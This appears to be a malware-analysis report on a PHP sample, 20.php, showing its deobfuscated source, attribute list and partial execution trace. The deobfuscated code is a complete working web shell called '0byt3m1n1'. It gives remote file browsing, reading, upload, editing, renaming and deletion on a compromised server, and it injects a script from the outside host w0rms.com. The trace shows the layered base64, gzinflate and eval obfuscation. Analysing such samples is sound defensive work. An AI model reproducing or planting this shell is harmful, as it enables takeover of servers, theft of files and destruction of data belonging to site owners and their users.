PHP Malware Analysis
20.php
md5: 7f3bb469abf188ca0d28fa8c7cc5afb6
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- 0byt3m1n1 (Deobfuscated, HTML)
URLs
- http://w0rms.com/kaydet.php (Deobfuscated, HTML, Traces)
- http://zerobyte.id/ (Deobfuscated, HTML, Traces)
- https://fonts.googleapis.com/css?family=VT323 (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
//w0rms.com shell secure
$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$r57txt = "==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";
eval /* PHPDeobfuscator eval output */ {
echo "<script src=http://w0rms.com/kaydet.php></script>";
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
?>
<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <?php
echo "<div style=\"color:#ef6c00;margin-top:0;\"><h1><center>0byt3m1n1</center></h1></div>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = getcwd();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
echo "<font style='font-size:13px;'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/>\r\n<input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<center><font color=\"#00ff00\">Upload OK!.</font></center><br/>";
} else {
echo "<center><font color=\"red\">Upload Failed!.</font></center><br/>";
}
}
echo "</td></tr><tr><td></table>";
if (isset($_GET['filesrc'])) {
echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
echo "" . basename($_GET['filesrc']);
"";
echo "</tr></td></table><br />";
echo "<center><textarea readonly=''>" . htmlspecialchars(file_get_contents($_GET['filesrc'])) . "</textarea></center>";
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
} else {
echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
} else {
echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
} else {
echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$scandir = scandir($path);
echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\">\r\n<th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th>\r\n<th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
echo "</table></div>";
}
echo "</body></html>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
echo "<br><center>© 2017 - <a href=\"http://zerobyte.id/\">ZeroByte.ID</a> Recoded from Kodong.</center><br>";
};
$encodephp = "";
"";
exit;Execution traces
data/traces/7f3bb469abf188ca0d28fa8c7cc5afb6_trace-1676251645.13.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:27:51.027870]
1 0 1 0.000188 393464
1 3 0 0.000259 398976 {main} 1 /var/www/html/uploads/20.php 0 0
1 A /var/www/html/uploads/20.php 3 $encoder57txt = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1 A /var/www/html/uploads/20.php 4 $r57txt = '==AZruAWY3qfKIg/wlrJFMvevml4PR8+IzinC8Umx/CM/6wbl7yH3acv8+Q+UvJ6eBbQ0n84Hwvb/HUa8fLSvqPsyMC5PM8PDnDCPTuBcGZBjlsYnNTGVhcuMfnYAR3Dxs5+YCN4WzMY6V3se4xnxMe6znhv1NrGf4+YDN4DuFM3ni8u/BvOB1r9km8ucBffgV6TFc0uBvSnoFi2zMqZhApbMEkfoqvsb56zbR9xSgd+z/oy1cyQ+15S0nudxDN0nJ1g60F/0ZDnqr1cl29Mhy65SNbnu4enNcuOXyZ62lI0bzn6bxn6uR2fDJTNQJhDw06VfgMu4pjsLvR/WPyPPtldQeKAOnq4p57STN5WDklFYtMGPKiy+P1YU/UyVjDuR3fdHrhcM+vqty5ZtlyB400v7i5NJ/1BuJ6dRGOyp5yT/X8puRlUc5oNJKFbX2gf8STln02CeQtoE1XjPSGer1+Za2e3fuW7ccKtfos2c45xYRkrL3C9v0YXinvK6FnR'
2 4 0 0.000323 398976 base64_decode 0 /var/www/html/uploads/20.php 5 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2 4 1 0.000345 399264
2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24r57txt%29%29%29%29%29%29%29%29%3B'
2 5 0 0.000366 399232 urldecode 0 /var/www/html/uploads/20.php 5 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24r57txt%29%29%29%29%29%29%29%29%3B'
2 5 1 0.000385 399456
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'
2 6 0 0.000404 399168 htmlspecialchars_decode 0 /var/www/html/uploads/20.php 5 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'
2 6 1 0.000422 399392
2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));'
2 7 0 0.000453 401512 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($r57txt))))))));' /var/www/html/uploads/20.php 5 0
3 8 0 0.000470 401512 strrev 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 '==AZruAWY3qfKIg/wlrJFMvevml4PR8+IzinC8Umx/CM/6wbl7yH3acv8+Q+UvJ6eBbQ0n84Hwvb/HUa8fLSvqPsyMC5PM8PDnDCPTuBcGZBjlsYnNTGVhcuMfnYAR3Dxs5+YCN4WzMY6V3se4xnxMe6znhv1NrGf4+YDN4DuFM3ni8u/BvOB1r9km8ucBffgV6TFc0uBvSnoFi2zMqZhApbMEkfoqvsb56zbR9xSgd+z/oy1cyQ+15S0nudxDN0nJ1g60F/0ZDnqr1cl29Mhy65SNbnu4enNcuOXyZ62lI0bzn6bxn6uR2fDJTNQJhDw06VfgMu4pjsLvR/WPyPPtldQeKAOnq4p57STN5WDklFYtMGPKiy+P1YU/UyVjDuR3fdHrhcM+vqty5ZtlyB400v7i5NJ/1BuJ6dRGOyp5yT/X8puRlUc5oNJKFbX2gf8STln02CeQtoE1XjPSGer1+Za2e3fuW7ccKtfos2c45xYRkrL3C9v0YXinvK6FnR'
3 8 1 0.000497 405640
3 8 R 'AW4JkfYBaQmW9gFkCZv2eJwBWQmm9nic1Vlbc9s2Fn73jP8DgqihNIlESnYcryTS08RJ20nbZBp3Z7qWx0ORoMQJRbIgFNtV9d97DgBedbHa7D7si00C54ZzvvMBoMYX6Tw9Pjo+Yt48IcY483iYCpJxz54LkQ5N887ii6znJQvzs/vgM9EDBWdsKkHHGB0fZUzcinDBbqNwEYq21YExxnnCbzlLEy7CeKYGw6A9A9mFOwu929+XiWDZ7Sz12p3OKkg4c715u3X78cOnK+JmpPWZPdhO64sbLVlnpcavcfCG2CQT4D2L3GzOsraWGa3Xx0cXzvHR+MnlhzdXv318S+ZiETlj/Ze5vjOOwvgzmXMW2JQSziKbZuIhYmCHCUrEQ8psKti9ML0so85YhCJijjV9ECeLftwfm2oAfJSGDExUBpkKklhkvVmSzCLmpqFKGti5CNxFGD3Y/746GZwY0qtRejXQmnzdcD9N/IfV1PU+z3iyjP0heTo4AxPnIy+J'
3 9 0 0.000526 405608 base64_decode 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 'AW4JkfYBaQmW9gFkCZv2eJwBWQmm9nic1Vlbc9s2Fn73jP8DgqihNIlESnYcryTS08RJ20nbZBp3Z7qWx0ORoMQJRbIgFNtV9d97DgBedbHa7D7si00C54ZzvvMBoMYX6Tw9Pjo+Yt48IcY483iYCpJxz54LkQ5N887ii6znJQvzs/vgM9EDBWdsKkHHGB0fZUzcinDBbqNwEYq21YExxnnCbzlLEy7CeKYGw6A9A9mFOwu929+XiWDZ7Sz12p3OKkg4c715u3X78cOnK+JmpPWZPdhO64sbLVlnpcavcfCG2CQT4D2L3GzOsraWGa3Xx0cXzvHR+MnlhzdXv318S+ZiETlj/Ze5vjOOwvgzmXMW2JQSziKbZuIhYmCHCUrEQ8psKti9ML0so85YhCJijjV9ECeLftwfm2oAfJSGDExUBpkKklhkvVmSzCLmpqFKGti5CNxFGD3Y/746GZwY0qtRejXQmnzdcD9N/IfV1PU+z3iyjP0heTo4AxPnIy+J'
3 9 1 0.000559 409736
3 9 R '\001n\t��\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\00'
3 10 0 0.000649 405608 gzinflate 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 '\001n\t��\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\00'
3 10 1 0.000742 408200
3 10 R '\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�'
3 11 0 0.000830 404072 gzinflate 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 '\001i\t��\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�'
3 11 1 0.000914 406664
3 11 R '\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\'
3 12 0 0.001000 404072 gzinflate 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 '\001d\t��x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\'
3 12 1 0.001083 406664
3 12 R 'x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\'
3 13 0 0.001168 404072 gzuncompress 0 /var/www/html/uploads/20.php(5) : eval()'d code 1 1 'x�\001Y\t��x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\'
3 13 1 0.001251 406664
